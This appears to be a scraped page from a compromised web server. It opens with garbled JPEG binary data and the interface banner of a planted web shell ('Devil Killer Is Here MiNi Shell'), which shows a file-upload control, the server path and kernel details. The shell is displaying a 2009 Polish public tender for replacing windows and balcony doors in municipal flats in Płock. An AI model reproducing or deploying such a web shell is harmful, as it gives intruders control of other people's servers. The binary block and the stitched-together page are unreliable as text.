JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/119685-N-2009.html

<p class="kh_header"><b>Płock: Wymiana stolarki okiennej  i drzwi  balkonowych w lokalach gminnych administrowanych przez MZGM - TBS sp. z o.o. w Płocku</b><br>
<b>Numer ogłoszenia: 119685 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 024 3640310, faks 024 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością ze 100% udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej  i drzwi  balkonowych w lokalach gminnych administrowanych przez MZGM - TBS sp. z o.o. w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i parapetami wewnętrznymi (zgodnie z protokołami typowania) oraz w części stolarki montaż nawiewników(zgodnie z protokołami typowania) w lokalach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują cztery Rejony Obsługi Mieszkańców tj.: ROM-I, ROM-III, ROM-IV i ROM-V. Każdy z ROM-ów administruje budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.
Ilość stolarki okiennej i drzwi balkonowych do wymiany z podziałem na Rejony Obsługi Mieszkańców zwanych dalej  ROM:
1. Część I (ROM I) 	- 69 okien i 10 drzwi balkonowych
2. Część II (ROM III) 	- 27okien i 6 drzwi balkonowych
3. Część III (ROM IV)	- 66  okien i 12 drzwi balkonowych
4. Część IV (ROM V)	- 63 okien i 7 drzwi balkonowych	
Łącznie 225 okien i 35 drzwi balkonowych.
Wyrób powinien być dopuszczony do obrotu w budownictwie (profil oraz wszystkie elementy składowe).
Stolarkę należy wykonać z wysokoudarowego, wzmocnionego PCV, ostatecznie wykończoną w kolorze białym. Profil okien 5-cio komorowy, niepocieniony, okucia obwiedniowe, spełniające wymagania Polskich Norm i aprobat z możliwością mikrowentylacji przy zamkniętym skrzydle. Grubość skrzydła min. 70 mm, wzmocnienia stalowe o grubości min. 1,5 mm o przekroju ceowym, grubość ramy min. 70 mm, wzmocnienie ramy stalowe o grubości min. 1,5 mm o przekroju prostokątnym. Stolarka powinna posiadać współczynnik infiltracji powietrza a=0,5-1,0 oraz być wyposażona w uszczelki przylgowe typ EPD 11, równoważne lub wyższej klasy, na całym obwodzie okna odpowiadające normom Producenta. Okna powinny posiadać szyby zespolone o współczynniku min.U=1,1 W )m2K. Część stolarki musi mieć górną ościeżnicę okien i drzwi  balkonowych szerokości 15 cm, zgodnie z zapisami w protokołach typowania.
Stolarka okienna musi posiadać geometrię i sposób otwierania z zachowaniem istniejącego podziału.
Szczegółowy zakres robót oraz schematy stolarki określają załączniki Protokóły typowania robót o numerach od 180 do 209 -załącznik Nr 3 - Część I (ROM I) ,Protokóły typowania robót o numerach od 167 do 178 -załącznik Nr 3a - Część II (ROM III),Protokóły typowania robót o numerach od 142 do 155 i od 157 do 166 -załącznik Nr 3b - Część III (ROM IV ), Protokóły typowania robót o numerach od 142 do 168 -załącznik Nr 3c - Część IV (ROM V) do SIWZ i Przedmiar robót Część I(ROM I) załącznik Nr 4, Przedmiar robót Część II(ROM III) załącznik Nr 4a, Przedmiar robót Część III(ROM IV)  załącznik Nr 4b, Przedmiar robót Część IV(ROM V) załącznik Nr 4c do SIWZ oraz Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część I(ROM I)załącznik Nr 5, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część II (ROM III) załącznik Nr 5a, Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część III (ROM IV) załącznik nr 5b, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część IV (ROM V) załącznik nr 5c,  stanowiące integralną część opisu przedmiotu zamówienia.
Do zakresu robót należą następujące czynności:
- demontaż starych okien i drzwi balkonowych,
-  montaż nowej stolarki PCV,
- demontaż i montaż balustrad balkonowych,
- demontaż istniejących parapetów,
- montaż nowych parapetów z blachy ocynkowanej stalowej,
-  montaż parapetów wewnętrznych wg protokołów typowań,
- montaż nawiewników okiennych wg protokołów typowań,
- uzupełnienie tynków zwykłych kategorii III w ościeżach,
- dwukrotne malowanie farbą emulsyjną tynków w ościeżach.

Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót i środowisko.
Wykonawca jest zobowiązany usuwać na bieżąco, na własny koszt, wszelkie uszkodzenia i zanieczyszczenia spowodowane przez jego pojazdy na drogach publicznych dojazdach do miejsc wymiany stolarki oraz usuwać na bieżąco elementy pochodzące z rozbiórki.

Powyższe postępowanie dotyczy ROM-I, ROM III, ROM-IV,  ROM-V, gdzie wykonanie wymiany stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z podokiennikami zewnętrznymi i parapetami wewnętrznymi w każdym z nich stanowić będzie  jedną odrębną CZĘŚĆ zamówienia.
Na każdą z nich zawarte będą cztery odrębne niezależne od siebie umowy.  

Uwaga:
Na proponowaną w ofercie stolarkę wymagane są certyfikaty, atesty oraz Aprobata Techniczna (nie sam aneks do aprobaty) załączona do oferty oraz Deklaracja zgodności wystawiona przez producenta przedłożona przed odbiorem robót.
Na całość wykonanych prac wymaga się minimum 60 - miesięcznej  gwarancji producenta..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca Przystępując do  przetargu jest zobowiązany wnieść wadium w wysokości:
na Część I dla (ROM I ) - 750,00 słownie: siedemset pięćdziesiąt złotych
na Część II dla (ROM III) - 750,00 słownie: siedemset pięćdziesiąt złotych
na Część III dla (ROM IV) - 750,00 słownie: siedemset pięćdziesiąt złotych
na Część IV dla (ROM V) - 750,00 słownie: siedemset pięćdziesiąt złotych
Łącznie wadium dla wszystkich części zamówienia 3.000,00 zł (trzy tysiące złotych )
2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz U. Nr 109, poz.
 1158 z późn. zm.).
3. Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy MZGM - TBS  sp. z o.o. w Banku PKO Bank Polski S.A. 2 Oddział w Płocku Nr konta: 30 1020 3974 0000 5402 0098 2272
Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdują się na koncie Zamawiającego w terminie /godzina / składania ofert.
4.Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia zostanie wykluczony z przedmiotowego postępowania na podstawie art. 24 ust. 2 pkt. 4 Prawa zamówień publicznych. 
5.Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie oryginału.
6.Zamawiający zwraca niezwłocznie wadium, jeżeli:
1) upłynął termin związania ofertą,
2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego 
wykonania tek umowy,
3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął  termin do ich wnoszenia
7. Z zastrzeżeniem pkt. 8 Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
1)który wycofał ofertę przed upływem terminu składania ofert,
2)który został wykluczony z postępowania,
3)którego oferta została odrzucona.
8.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia , w tym:
a)wykonali w ciągu ostatnich pięciu lat (przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną robotę budowlaną (na każdą Część zamówienia oddzielnie)odpowiadającą swoim rodzajem  robotom 
budowlanym stanowiącym przedmiot zamówienia w ramach Części, tj wymianę stolarki okiennej oraz  o wartości nie niższej niż 50% ceny ofertowej brutto zaproponowanej w formularzu oferty przez Wykonawcę w ramach tej Części (ROM-u,ROM-ów), na którą będzie składana przyszła oferta wraz z załączonymi referencjami/dokumentami potwierdzającymi, że robota  ta została wykonana należycie.
b)dysponują lub będą dysponować co najmniej jednym kierownikiem robót posiadającym uprawnienia budowlane i wpisanym na listę członków Okręgowej Izby Inżynierów Budownictwa. (Wykonawca składając ofertę na jedną lub więcej Części zamówienia powinien dysponować  co najmniej jednym kierownikiem robót posiadającym uprawnienia budowlane i wpisanym na listę członków Okręgowej Izby Inżynierów Budownictwa).
3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego. 
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia-nie spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)Formularz oferty - Załącznik Nr1.
b)Oświadczenie wykonawcy, że spełnia wymagania określone w art. 22 ust. 1 Prawo zamówień publicznych oraz nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego - Załącznik Nr 3.
c)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji 
działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)Aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)Wykaz wykonanej w ciągu ostatnich pięciu lat (przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej roboty budowlanej na każdą Część zamówienia oddzielnie odpowiadającej swoim rodzajem  robotom budowlanym stanowiącym przedmiot zamówienia(w ramach Części zamówienia),tj. wymianę stolarki okiennej oraz  o wartości nie niższej niż 50% ceny ofertowej brutto zaproponowanej w formularzu oferty przez Wykonawcę w ramach tej Części (ROM-u,ROM-ów), na którą będzie składana oferta  wraz z załączonymi referencjami,dokumentami potwierdzającymi, że robota  ta została wykonana należycie odpowiednio na każdą Część zamówienia wg poniższych Załączników:
 - Załącznik Nr 7 - Część I - (ROM I ),
 - Załącznik  Nr 7a - Część II (ROM III), 
 - Załącznik Nr 7b -  Część III - (ROM IV), 
 - Załącznik Nr 7c -  Część III - (ROM V).  
Zamawiający dopuszcza  możliwość wykazania się jedną robotą budowlaną odpowiadającą zsumowanym wartościom w ramach wybranych Części. W tym przypadku Wykonawca  wykazuje powyższą robotę budowlaną w każdym załączniku Wykaz wykonanych robót budowlanych  dla wybranych Części
f)Wykaz  osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. Jeżeli Wykonawca w wykazie Załącznik nr 9 wykaże osoby którymi będzie dysponował należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do realizacji przedmiotowej usługi. Do wykazu należy dołączyć dokumenty   potwierdzające, iż osoby które będą  wykonywać zamówienia posiadają wymagane przez zamawiającego kwalifikacje:
- Kopia uprawnień budowlanych kierownika robót.
-Kopia aktualnego zaświadczenia o członkostwie w Okręgowej Izbie Inżynierów Budownictwa kierownika robót
(Wykonawca składając ofertę na jedną lub więcej Części zamówienia powinien dysponować  co najmniej jednym kierownikiem robót posiadającym uprawnienia budowlane i wpisanym na listę członków Okręgowej Izby Inżynierów Budownictwa).
g) Certyfikaty,Atesty - dla szyb zespolonych, okuć drzwi balkonowych i okien, kształtowników dla proponowanej stolarki okiennej oraz Aprobata Techniczna na proponowaną w ofercie stolarkę (nie sam
aneks do aprobaty)
h) Wykaz  części zamówienia, których wykonanie Wykonawca powierza podwykonawcom - Załącznik     Nr 8, Nr 8a, Nr 8b, Nr 8c
W przypadku, gdy Wykonawca nie przewiduje podwykonawców - wpisuje on Nie dotyczy i załącza niewypełnione Załączniki Nr 8 , Nr 8a, Nr 8b, Nr 8c  do oferty.
i) W przypadku złożenia oferty wspólnej - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymaga się, aby każdy z Wykonawców występujących wspólnie złożył dokumenty określone w niniejszym punkcie - lit. ( b, c, d ).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z.o.o. ul. POlna 7 , 09-400 Płock.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 09:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z.o.o. ul. POlna 7 , 09-400 Płock, Kancelaria p. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ROM I.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i parapetami wewnętrznymi (zgodnie z protokołami typowania) oraz w części stolarki montaż nawiewników(zgodnie z protokołami typowania) w lokalach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują cztery Rejony Obsługi Mieszkańców tj.: ROM-I, ROM-III, ROM-IV i ROM-V. Każdy z ROM-ów administruje budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.
Ilość stolarki okiennej i drzwi balkonowych do wymiany z podziałem na Rejony Obsługi Mieszkańców zwanych dalej  ROM:
1. Część I (ROM I) 	- 69 okien i 10 drzwi balkonowych
2. Część II (ROM III) 	- 27okien i 6 drzwi balkonowych
3. Część III (ROM IV)	- 66  okien i 12 drzwi balkonowych
4. Część IV (ROM V)	- 63 okien i 7 drzwi balkonowych	
Łącznie 225 okien i 35 drzwi balkonowych.
Wyrób powinien być dopuszczony do obrotu w budownictwie (profil oraz wszystkie elementy składowe).
Stolarkę należy wykonać z wysokoudarowego, wzmocnionego PCV, ostatecznie wykończoną w kolorze białym. Profil okien 5-cio komorowy, niepocieniony, okucia obwiedniowe, spełniające wymagania Polskich Norm i aprobat z możliwością mikrowentylacji przy zamkniętym skrzydle. Grubość skrzydła min. 70 mm, wzmocnienia stalowe o grubości min. 1,5 mm o przekroju ceowym, grubość ramy min. 70 mm, wzmocnienie ramy stalowe o grubości min. 1,5 mm o przekroju prostokątnym. Stolarka powinna posiadać współczynnik infiltracji powietrza a=0,5-1,0 oraz być wyposażona w uszczelki przylgowe typ EPD 11, równoważne lub wyższej klasy, na całym obwodzie okna odpowiadające normom Producenta. Okna powinny posiadać szyby zespolone o współczynniku min.U=1,1 W )m2K. Część stolarki musi mieć górną ościeżnicę okien i drzwi  balkonowych szerokości 15 cm, zgodnie z zapisami w protokołach typowania.
Stolarka okienna musi posiadać geometrię i sposób otwierania z zachowaniem istniejącego podziału.
Szczegółowy zakres robót oraz schematy stolarki określają załączniki Protokóły typowania robót o numerach od 180 do 209 -załącznik Nr 3 - Część I (ROM I) ,Protokóły typowania robót o numerach od 167 do 178 -załącznik Nr 3a - Część II (ROM III),Protokóły typowania robót o numerach od 142 do 155 i od 157 do 166 -załącznik Nr 3b - Część III (ROM IV ), Protokóły typowania robót o numerach od 142 do 168 -załącznik Nr 3c - Część IV (ROM V) do SIWZ i Przedmiar robót Część I(ROM I) załącznik Nr 4, Przedmiar robót Część II(ROM III) załącznik Nr 4a, Przedmiar robót Część III(ROM IV)  załącznik Nr 4b, Przedmiar robót Część IV(ROM V) załącznik Nr 4c do SIWZ oraz Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część I(ROM I)załącznik Nr 5, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część II (ROM III) załącznik Nr 5a, Wykaz stolarki okiennej i drzwi balkonowych do wymiany - Część III (ROM IV) załącznik nr 5b, Wykaz stolarki okiennej i drzwi balkonowych do wymiany- Część IV (ROM V) załącznik nr 5c,  stanowiące integralną część opisu przedmiotu zamówienia.
Do zakresu robót należą następujące czynności:
- demontaż starych okien i drzwi balkonowych,
-  montaż nowej stolarki PCV,
- demontaż i montaż balustrad balkonowych,
- demontaż istniejących parapetów,
- montaż nowych parapetów z blachy ocynkowanej stalowej,
-  montaż parapetów wewnętrznych wg protokołów typowań,
- montaż nawiewników okiennych wg protokołów typowań,
- uzupełnienie tynków zwykłych kategorii III w ościeżach,
- dwukrotne malowanie farbą emulsyjną tynków w ościeżach.

Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie spowoduje niekorzystnego wpływu na jakość wykonywanych robót i środowisko.
Wykonawca jest zobowiązany usuwać na bieżąco, na własny koszt, wszelkie uszkodzenia i zanieczyszczenia spowodowane przez jego pojazdy na drogach publicznych dojazdach do miejsc wymiany stolarki oraz usuwać na bieżąco elementy pochodzące z rozbiórki.

Powyższe postępowanie dotyczy ROM-I, ROM III, ROM-IV,  ROM-V, gdzie wykonanie wymiany stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z podokiennikami zewnętrznymi i parapetami wewnętrznymi w każdym z nich stanowić będzie  jedną odrębną CZĘŚĆ zamówienia.
Na każdą z nich zawarte będą cztery odrębne niezależne od siebie umowy.  

Uwaga:
Na proponowaną w ofercie stolarkę wymagane są certyfikaty, atesty oraz Aprobata Techniczna (nie sam aneks do aprobaty) załączona do oferty oraz Deklaracja zgodności wystawiona przez producenta przedłożona przed odbiorem robót.
Na całość wykonanych prac wymaga się minimum 60 - miesięcznej  gwarancji producenta..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ROM III.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana stolarki okiennej i drzwi balkonowych drewnianych na stolarkę PCV wraz z parapetami zewnętrznymi i parapetami wewnętrznymi (zgodnie z protokołami typowania) oraz w części stolarki montaż nawiewników(zgodnie z protokołami typowania) w lokalach mieszkalnych gminnych administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS w Płocku. W spółce funkcjonują cztery Rejony Obsługi Mieszkańców tj.: ROM-I, ROM-III, ROM-IV i ROM-V. Każdy z ROM-ów administruje budynkami komunalnymi, których właścicielem jest Gmina Miasto - Płock, będących przedmiotem zamówienia.
Ilość stolarki okiennej i drzwi balkonowych do wymiany z podziałem na Rejony Obsługi Mieszkańców zwanych dalej  ROM:
1. Część I (ROM I) 	- 69 okien i 10 drzwi balkonowych
2. Część II (ROM III) 	- 27okien i 6 drzwi balkonowych
3. Część III (ROM IV)	- 66  okien i 12 drzwi balkonowych
4. Część IV (ROM V)	- 63 okien i 7 drzwi balkonowych	
